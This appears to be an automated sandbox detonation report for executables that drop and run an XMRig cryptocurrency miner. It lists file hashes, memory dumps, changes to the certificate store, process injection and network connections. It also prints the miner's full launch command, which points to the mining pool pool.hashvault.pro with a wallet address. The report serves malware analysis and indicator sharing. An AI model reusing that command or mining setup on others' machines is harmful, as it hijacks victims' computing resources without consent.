| SHA1 | f714ec0448325435103519452610cf7aadf8bbba |
| SHA256 | d0cf7388253342f43f9b04da27f3da9ee18614539efdc2d9c4a0239af51ddbe4 |
| SHA512 | 8455c47e8470e0e322426bc9b9f3c7e858d803bfc8c5d576d580f88585f550b95043139d69b0750a3e211915e3f5ec7a67e7784dcf8cac6bd8fe51ab7e9cbed6 |
memory/1668-16-0x000001C7EA6A0000-0x000001C7EA6C0000-memory.dmp
memory/1668-17-0x000001C7EA6F0000-0x000001C7EA710000-memory.dmp
memory/1668-18-0x00007FF762C30000-0x00007FF763733000-memory.dmp
memory/1668-19-0x000001C7EA730000-0x000001C7EA750000-memory.dmp
memory/1668-20-0x000001C7EA710000-0x000001C7EA730000-memory.dmp
memory/1668-21-0x00007FF762C30000-0x00007FF763733000-memory.dmp
memory/1668-22-0x00007FF762C30000-0x00007FF763733000-memory.dmp
memory/1668-25-0x000001C7EA710000-0x000001C7EA730000-memory.dmp
memory/1668-24-0x000001C7EA730000-0x000001C7EA750000-memory.dmp
memory/1668-23-0x00007FF762C30000-0x00007FF763733000-memory.dmp
memory/1668-26-0x00007FF762C30000-0x00007FF763733000-memory.dmp
memory/1668-27-0x00007FF762C30000-0x00007FF763733000-memory.dmp
memory/1668-28-0x00007FF762C30000-0x00007FF763733000-memory.dmp
memory/1668-29-0x00007FF762C30000-0x00007FF763733000-memory.dmp
memory/1668-30-0x00007FF762C30000-0x00007FF763733000-memory.dmp
memory/1668-31-0x00007FF762C30000-0x00007FF763733000-memory.dmp
memory/1668-32-0x00007FF762C30000-0x00007FF763733000-memory.dmp
memory/1668-33-0x00007FF762C30000-0x00007FF763733000-memory.dmp
memory/1668-34-0x00007FF762C30000-0x00007FF763733000-memory.dmp
memory/1668-35-0x00007FF762C30000-0x00007FF763733000-memory.dmp
memory/1668-36-0x00007FF762C30000-0x00007FF763733000-memory.dmp
memory/1668-37-0x00007FF762C30000-0x00007FF763733000-memory.dmp
memory/1668-38-0x00007FF762C30000-0x00007FF763733000-memory.dmp
memory/1668-39-0x00007FF762C30000-0x00007FF763733000-memory.dmp
memory/1668-40-0x00007FF762C30000-0x00007FF763733000-memory.dmp
memory/1668-41-0x00007FF762C30000-0x00007FF763733000-memory.dmp
memory/1668-42-0x00007FF762C30000-0x00007FF763733000-memory.dmp
memory/1668-43-0x00007FF762C30000-0x00007FF763733000-memory.dmp
memory/1668-44-0x00007FF762C30000-0x00007FF763733000-memory.dmp
memory/1668-45-0x00007FF762C30000-0x00007FF763733000-memory.dmp
memory/1668-46-0x00007FF762C30000-0x00007FF763733000-memory.dmp
memory/1668-47-0x00007FF762C30000-0x00007FF763733000-memory.dmp
memory/1668-48-0x00007FF762C30000-0x00007FF763733000-memory.dmp
memory/1668-49-0x00007FF762C30000-0x00007FF763733000-memory.dmp
memory/1668-50-0x00007FF762C30000-0x00007FF763733000-memory.dmp
memory/1668-51-0x00007FF762C30000-0x00007FF763733000-memory.dmp
memory/1668-52-0x00007FF762C30000-0x00007FF763733000-memory.dmp
memory/1668-53-0x00007FF762C30000-0x00007FF763733000-memory.dmp
memory/1668-54-0x00007FF762C30000-0x00007FF763733000-memory.dmp
memory/1668-55-0x00007FF762C30000-0x00007FF763733000-memory.dmp
memory/1668-56-0x00007FF762C30000-0x00007FF763733000-memory.dmp
memory/1668-57-0x00007FF762C30000-0x00007FF763733000-memory.dmp
memory/1668-58-0x00007FF762C30000-0x00007FF763733000-memory.dmp
memory/1668-59-0x00007FF762C30000-0x00007FF763733000-memory.dmp
memory/1668-60-0x00007FF762C30000-0x00007FF763733000-memory.dmp
memory/1668-61-0x00007FF762C30000-0x00007FF763733000-memory.dmp
memory/1668-62-0x00007FF762C30000-0x00007FF763733000-memory.dmp
memory/1668-63-0x00007FF762C30000-0x00007FF763733000-memory.dmp
memory/1668-64-0x00007FF762C30000-0x00007FF763733000-memory.dmp
memory/1668-65-0x00007FF762C30000-0x00007FF763733000-memory.dmp
memory/1668-66-0x00007FF762C30000-0x00007FF763733000-memory.dmp
memory/1668-67-0x00007FF762C30000-0x00007FF763733000-memory.dmp
memory/1668-68-0x00007FF762C30000-0x00007FF763733000-memory.dmp
memory/1668-69-0x00007FF762C30000-0x00007FF763733000-memory.dmp
memory/1668-70-0x00007FF762C30000-0x00007FF763733000-memory.dmp
memory/1668-71-0x00007FF762C30000-0x00007FF763733000-memory.dmp
memory/1668-72-0x00007FF762C30000-0x00007FF763733000-memory.dmp
memory/1668-73-0x00007FF762C30000-0x00007FF763733000-memory.dmp
memory/1668-74-0x00007FF762C30000-0x00007FF763733000-memory.dmp
memory/1668-75-0x00007FF762C30000-0x00007FF763733000-memory.dmp
memory/1668-76-0x00007FF762C30000-0x00007FF763733000-memory.dmp
memory/1668-77-0x00007FF762C30000-0x00007FF763733000-memory.dmp
memory/1668-78-0x00007FF762C30000-0x00007FF763733000-memory.dmp
memory/1668-79-0x00007FF762C30000-0x00007FF763733000-memory.dmp
memory/1668-80-0x00007FF762C30000-0x00007FF763733000-memory.dmp
memory/1668-81-0x00007FF762C30000-0x00007FF763733000-memory.dmp
memory/1668-82-0x00007FF762C30000-0x00007FF763733000-memory.dmp
memory/1668-83-0x00007FF762C30000-0x00007FF763733000-memory.dmp
memory/1668-84-0x00007FF762C30000-0x00007FF763733000-memory.dmp
Analysis: behavioral2
Detonation Overview
Submitted
2024-05-22 19:05
Reported
2024-05-22 19:51
Platform
win10v2004-20240226-en
Max time kernel
1798s
Max time network
1814s
Command Line
Signatures
XMRig Miner payload
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
xmrig
Executes dropped EXE
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe | N/A |
Modifies system certificate store
| Description | Indicator | Process | Target |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349 | C:\Users\Admin\AppData\Local\Temp\main - Copy (2) - Copy.exe | N/A |
| Set value (data) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349\Blob = … | C:\Users\Admin\AppData\Local\Temp\main - Copy (2) - Copy.exe | N/A |
| Set value (data) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349\Blob = … | C:\Users\Admin\AppData\Local\Temp\main - Copy (2) - Copy.exe | N/A |
Suspicious behavior: LoadsDriver
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeLockMemoryPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe | N/A |
| Token: SeLockMemoryPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe | N/A |
| Token: SeManageVolumePrivilege | N/A | C:\Windows\System32\svchost.exe | N/A |
Suspicious use of FindShellTrayWindow
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe | N/A |
Suspicious use of WriteProcessMemory
| Description | Indicator | Process | Target |
| PID 1140 wrote to memory of 872 | N/A | C:\Users\Admin\AppData\Local\Temp\main - Copy (2) - Copy.exe | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe |
| PID 1140 wrote to memory of 872 | N/A | C:\Users\Admin\AppData\Local\Temp\main - Copy (2) - Copy.exe | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe |
Processes
C:\Users\Admin\AppData\Local\Temp\main - Copy (2) - Copy.exe
"C:\Users\Admin\AppData\Local\Temp\main - Copy (2) - Copy.exe"
C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe
xmrig-6.21.0\xmrig.exe --url pool.hashvault.pro:80 --user 46DiTxnXmukGpoGKFDViugiZA1Zuu181wJGSTvGVyJUv4HAdJaozh3jMX7nAEauswGVAUvLnY6tai2AbiKv9Pbt2EAsu8yR --pass T --donate-level 1 --tls --tls-fingerprint 420c7850e09b7c0bdcf748a7da9eb3647daf8515718f36d9ccfdd6b9ff834b14
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=asset_store.mojom.AssetStoreService --lang=en-US --service-sandbox-type=asset_store_service --no-appcompat-clear --mojo-platform-channel-handle=4800 --field-trial-handle=2292,i,2103142837140538807,15881446839139365070,262144 --variations-seed-version /prefetch:8
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=asset_store.mojom.AssetStoreService --lang=en-US --service-sandbox-type=asset_store_service --no-appcompat-clear --mojo-platform-channel-handle=5044 --field-trial-handle=2292,i,2103142837140538807,15881446839139365070,262144 --variations-seed-version /prefetch:8
C:\Windows\system32\rundll32.exe
"C:\Windows\system32\rundll32.exe" "C:\Windows\SYSTEM32\EDGEHTML.dll",#141 Microsoft.VCLibs.140.00_8wekyb3d8bbwe
C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k UnistackSvcGroup
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | 144.107.17.2.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 133.211.185.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 68.159.190.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 95.221.229.192.in-addr.arpa | udp |
| US | 8.8.8.8:53 | github.com | udp |
| GB | 20.26.156.215:443 | github.com | tcp |
| US | 8.8.8.8:53 | objects.githubusercontent.com | udp |
| US | 185.199.108.133:443 | objects.githubusercontent.com | tcp |
| US | 8.8.8.8:53 | 215.156.26.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 133.108.199.185.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 58.55.71.13.in-addr.arpa | udp |
| US | 8.8.8.8:53 | pool.hashvault.pro | udp |
| DE | 95.179.241.203:80 | pool.hashvault.pro | tcp |
| US | 8.8.8.8:53 | 203.241.179.95.in-addr.arpa | udp |
| US | 13.107.253.64:443 | | tcp |
| US | 8.8.8.8:53 | 86.23.85.13.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 198.187.3.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 196.249.167.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 203.107.17.2.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 43.229.111.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 98.83.221.88.in-addr.arpa | udp |
| US | 8.8.8.8:53 | chromewebstore.googleapis.com | udp |
| US | 8.8.8.8:53 | chromewebstore.googleapis.com | udp |
| GB | 216.58.212.234:443 | chromewebstore.googleapis.com | tcp |
| US | 8.8.8.8:53 | 234.212.58.216.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 105.193.132.51.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 134.32.126.40.in-addr.arpa | udp |
| US | 8.8.8.8:53 | www.microsoft.com | udp |
| BE | 2.21.17.194:80 | www.microsoft.com | tcp |
| US | 8.8.8.8:53 | 9.228.82.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 194.17.21.2.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 67.32.209.4.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 219.93.73.104.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 56.126.166.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 166.17.21.2.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 119.110.54.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 172.210.232.199.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 152.107.17.2.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 225.107.17.2.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 141.135.123.92.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 0.205.248.87.in-addr.arpa | udp |
Files
C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe
| MD5 | e2fe87cc2c7dab8ca6516620dccd1381 |
| SHA1 | f714ec0448325435103519452610cf7aadf8bbba |
| SHA256 | d0cf7388253342f43f9b04da27f3da9ee18614539efdc2d9c4a0239af51ddbe4 |
| SHA512 | 8455c47e8470e0e322426bc9b9f3c7e858d803bfc8c5d576d580f88585f550b95043139d69b0750a3e211915e3f5ec7a67e7784dcf8cac6bd8fe51ab7e9cbed6 |
memory/872-16-0x0000028F95A40000-0x0000028F95A60000-memory.dmp
memory/872-17-0x0000028F95A90000-0x0000028F95AB0000-memory.dmp
memory/872-18-0x00007FF68B140000-0x00007FF68BC43000-memory.dmp
memory/872-19-0x00007FF68B140000-0x00007FF68BC43000-memory.dmp
memory/872-21-0x0000028F97280000-0x0000028F972A0000-memory.dmp
memory/872-20-0x0000028F97260000-0x0000028F97280000-memory.dmp
memory/872-22-0x00007FF68B140000-0x00007FF68BC43000-memory.dmp
memory/872-23-0x00007FF68B140000-0x00007FF68BC43000-memory.dmp
memory/872-24-0x00007FF68B140000-0x00007FF68BC43000-memory.dmp
memory/872-25-0x0000028F97260000-0x0000028F97280000-memory.dmp
memory/872-26-0x0000028F97280000-0x0000028F972A0000-memory.dmp
memory/872-27-0x00007FF68B140000-0x00007FF68BC43000-memory.dmp
memory/872-28-0x00007FF68B140000-0x00007FF68BC43000-memory.dmp
memory/872-29-0x00007FF68B140000-0x00007FF68BC43000-memory.dmp
memory/872-30-0x00007FF68B140000-0x00007FF68BC43000-memory.dmp
memory/872-31-0x00007FF68B140000-0x00007FF68BC43000-memory.dmp
memory/872-32-0x00007FF68B140000-0x00007FF68BC43000-memory.dmp
memory/872-33-0x00007FF68B140000-0x00007FF68BC43000-memory.dmp
memory/872-34-0x00007FF68B140000-0x00007FF68BC43000-memory.dmp
memory/872-35-0x00007FF68B140000-0x00007FF68BC43000-memory.dmp
memory/872-36-0x00007FF68B140000-0x00007FF68BC43000-memory.dmp
memory/872-37-0x00007FF68B140000-0x00007FF68BC43000-memory.dmp
memory/872-38-0x00007FF68B140000-0x00007FF68BC43000-memory.dmp
memory/872-39-0x00007FF68B140000-0x00007FF68BC43000-memory.dmp
memory/872-40-0x00007FF68B140000-0x00007FF68BC43000-memory.dmp
memory/872-41-0x00007FF68B140000-0x00007FF68BC43000-memory.dmp
memory/872-42-0x00007FF68B140000-0x00007FF68BC43000-memory.dmp
memory/872-43-0x00007FF68B140000-0x00007FF68BC43000-memory.dmp
memory/872-44-0x00007FF68B140000-0x00007FF68BC43000-memory.dmp
memory/872-45-0x00007FF68B140000-0x00007FF68BC43000-memory.dmp
memory/872-46-0x00007FF68B140000-0x00007FF68BC43000-memory.dmp
memory/872-47-0x00007FF68B140000-0x00007FF68BC43000-memory.dmp
memory/872-48-0x00007FF68B140000-0x00007FF68BC43000-memory.dmp
memory/872-49-0x00007FF68B140000-0x00007FF68BC43000-memory.dmp
memory/872-50-0x00007FF68B140000-0x00007FF68BC43000-memory.dmp
memory/872-51-0x00007FF68B140000-0x00007FF68BC43000-memory.dmp
memory/872-52-0x00007FF68B140000-0x00007FF68BC43000-memory.dmp
memory/872-53-0x00007FF68B140000-0x00007FF68BC43000-memory.dmp
memory/872-54-0x00007FF68B140000-0x00007FF68BC43000-memory.dmp
memory/872-55-0x00007FF68B140000-0x00007FF68BC43000-memory.dmp
memory/872-56-0x00007FF68B140000-0x00007FF68BC43000-memory.dmp
memory/872-57-0x00007FF68B140000-0x00007FF68BC43000-memory.dmp
memory/872-58-0x00007FF68B140000-0x00007FF68BC43000-memory.dmp
memory/872-59-0x00007FF68B140000-0x00007FF68BC43000-memory.dmp
memory/872-60-0x00007FF68B140000-0x00007FF68BC43000-memory.dmp
memory/872-61-0x00007FF68B140000-0x00007FF68BC43000-memory.dmp
memory/872-62-0x00007FF68B140000-0x00007FF68BC43000-memory.dmp
memory/872-63-0x00007FF68B140000-0x00007FF68BC43000-memory.dmp
memory/872-64-0x00007FF68B140000-0x00007FF68BC43000-memory.dmp
memory/872-65-0x00007FF68B140000-0x00007FF68BC43000-memory.dmp
memory/872-66-0x00007FF68B140000-0x00007FF68BC43000-memory.dmp
memory/872-67-0x00007FF68B140000-0x00007FF68BC43000-memory.dmp
memory/872-68-0x00007FF68B140000-0x00007FF68BC43000-memory.dmp
memory/872-69-0x00007FF68B140000-0x00007FF68BC43000-memory.dmp
memory/872-70-0x00007FF68B140000-0x00007FF68BC43000-memory.dmp
memory/872-71-0x00007FF68B140000-0x00007FF68BC43000-memory.dmp
memory/872-72-0x00007FF68B140000-0x00007FF68BC43000-memory.dmp
memory/872-73-0x00007FF68B140000-0x00007FF68BC43000-memory.dmp
memory/872-74-0x00007FF68B140000-0x00007FF68BC43000-memory.dmp
memory/872-75-0x00007FF68B140000-0x00007FF68BC43000-memory.dmp
memory/872-76-0x00007FF68B140000-0x00007FF68BC43000-memory.dmp
memory/872-77-0x00007FF68B140000-0x00007FF68BC43000-memory.dmp
memory/872-78-0x00007FF68B140000-0x00007FF68BC43000-memory.dmp
memory/872-79-0x00007FF68B140000-0x00007FF68BC43000-memory.dmp
memory/872-80-0x00007FF68B140000-0x00007FF68BC43000-memory.dmp
memory/872-81-0x00007FF68B140000-0x00007FF68BC43000-memory.dmp
memory/872-82-0x00007FF68B140000-0x00007FF68BC43000-memory.dmp
memory/872-83-0x00007FF68B140000-0x00007FF68BC43000-memory.dmp
memory/872-84-0x00007FF68B140000-0x00007FF68BC43000-memory.dmp
Analysis: behavioral6
Detonation Overview
Submitted
2024-05-22 19:05
Reported
2024-05-22 20:01
Platform
win10v2004-20240508-en
Max time kernel
1793s
Max time network
1797s
Command Line
Signatures
XMRig Miner payload
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
xmrig
Executes dropped EXE
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe | N/A |
Modifies system certificate store
| Description | Indicator | Process | Target |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349 | C:\Users\Admin\AppData\Local\Temp\main - Copy (4) - Copy.exe | N/A |
| Set value (data) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349\Blob = 0f00000001000000140000003e8e6487f8fd27d322a269a71edaac5d57811286090000000100000054000000305206082b0601050507030206082b06010505070303060a2b0601040182370a030406082b0601050507030406082b0601050507030606082b0601050507030706082b0601050507030106082b0601050507030853000000010000004300000030413022060c2b06010401b231010201050130123010060a2b0601040182373c0101030200c0301b060567810c010330123010060a2b0601040182373c0101030200c0620000000100000020000000d7a7a0fb5d7e2731d771e9484ebcdef71d5f0c3e0a2948782bc83ee0ea699ef40b000000010000001c0000005300650063007400690067006f002000280041004100410029000000140000000100000014000000a0110a233e96f107ece2af29ef82a57fd030a4b41d00000001000000100000002e0d6875874a44c820912e85e964cfdb030000000100000014000000d1eb23a46d17d68fd92564c2f1f1601764d8e349200000000100000036040000308204323082031aa003020102020101300d06092a864886f70d0101050500307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c18414141204365727469666963617465205365727669636573301e170d3034303130313030303030305a170d3238313233313233353935395a307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c1841414120436572746966696361746520536572766963657330820122300d06092a864886f70d01010105000382010f003082010a0282010100be409df46ee1ea76871c4d45448ebe46c883069dc12afe181f8ee402faf3ab5d508a16310b9a06d0c57022cd492d5463ccb66e68460b53eacb4c24c0bc724eeaf115aef4549a120ac37ab23360e2da8955f32258f3dedccfef8386a28c944f9f68f29890468427c776bfe3cc352c8b5e07646582c048b0a891f9619f762050a891c766b5eb78620356f08a1a13ea31a31ea099fd38f6f62732586f07f56bb8fb142bafb7aaccd6635f738cda0599a838a8cb17783651ace99ef4783a8dcf0fd942e2980cab2f9f0e01deef9f9949f12ddfac744d1b98b547c5e529d1f99018c7629cbe83c7267b3e8a25c7c0dd9de6356810209d8fd8ded2c3849c0d5ee82fc90203010001a381c03081bd301d0603551d0e04160414a0110a233e96f107ece2af29ef82a57fd030a4b4300e0603551d0f0101ff040403020106300f0603551d130101ff040530030101ff307b0603551d1f047430723038a036a0348632687474703a2f2f63726c2e636f6d6f646f63612e636f6d2f414141436572746966696361746553657276696365732e63726c3036a034a0328630687474703a2f2f63726c2e636f6d6f646f2e6e65742f414141436572746966696361746553657276696365732e63726c300d06092a864886f70d010105050003820101000856fc02f09be8ffa4fad67bc64480ce4fc4c5f60058cca6b6bc1449680476e8e6ee5dec020f60d68d50184f264e01e3e6b0a5eebfbc745441bffdfc12b8c74f5af48960057f60b7054af3f6f1c2bfc4b97486b62d7d6bccd2f346dd2fc6e06ac3c334032c7d96dd5ac20ea70a99c1058bab0c2ff35c3acf6c37550987de53406c58effcb6ab656e04f61bdc3ce05a15c69ed9f15948302165036cece92173ec9b03a1e037ada015188ffaba02cea72ca910132cd4e50826ab229760f8905e74d4a29a53bdf2a968e0a26ec2d76cb1a30f9ebfeb68e756f2aef2e32b383a0981b56b85d7be2ded3f1ab7b263e2f5622c82d46a004150f139839f95e93696986e | C:\Users\Admin\AppData\Local\Temp\main - Copy (4) - Copy.exe | N/A |
| Set value (data) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349\Blob = … | C:\Users\Admin\AppData\Local\Temp\main - Copy (4) - Copy.exe | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeLockMemoryPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe | N/A |
| Token: SeLockMemoryPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe | N/A |
Suspicious use of FindShellTrayWindow
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe | N/A |
Suspicious use of WriteProcessMemory
| Description | Indicator | Process | Target |
| PID 1240 wrote to memory of 2748 | N/A | C:\Users\Admin\AppData\Local\Temp\main - Copy (4) - Copy.exe | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe |
| PID 1240 wrote to memory of 2748 | N/A | C:\Users\Admin\AppData\Local\Temp\main - Copy (4) - Copy.exe | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe |
Processes
C:\Users\Admin\AppData\Local\Temp\main - Copy (4) - Copy.exe
"C:\Users\Admin\AppData\Local\Temp\main - Copy (4) - Copy.exe"
C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe
xmrig-6.21.0\xmrig.exe --url pool.hashvault.pro:80 --user 46DiTxnXmukGpoGKFDViugiZA1Zuu181wJGSTvGVyJUv4HAdJaozh3jMX7nAEauswGVAUvLnY6tai2AbiKv9Pbt2EAsu8yR --pass T --donate-level 1 --tls --tls-fingerprint 420c7850e09b7c0bdcf748a7da9eb3647daf8515718f36d9ccfdd6b9ff834b14
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | g.bing.com | udp |
| US | 204.79.197.237:443 | g.bing.com | tcp |
| US | 8.8.8.8:53 | github.com | udp |
| GB | 20.26.156.215:443 | github.com | tcp |
| US | 8.8.8.8:53 | 28.118.140.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 129.83.221.88.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 237.197.79.204.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 215.156.26.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | objects.githubusercontent.com | udp |
| US | 185.199.108.133:443 | objects.githubusercontent.com | tcp |
| NL | 23.62.61.155:443 | www.bing.com | tcp |
| US | 8.8.8.8:53 | 133.108.199.185.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 241.197.17.2.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 22.160.190.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 155.61.62.23.in-addr.arpa | udp |
| NL | 23.62.61.155:443 | www.bing.com | tcp |
| US | 8.8.8.8:53 | 209.205.72.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | pool.hashvault.pro | udp |
| DE | 95.179.241.203:80 | pool.hashvault.pro | tcp |
| US | 8.8.8.8:53 | 203.241.179.95.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 228.249.119.40.in-addr.arpa | udp |
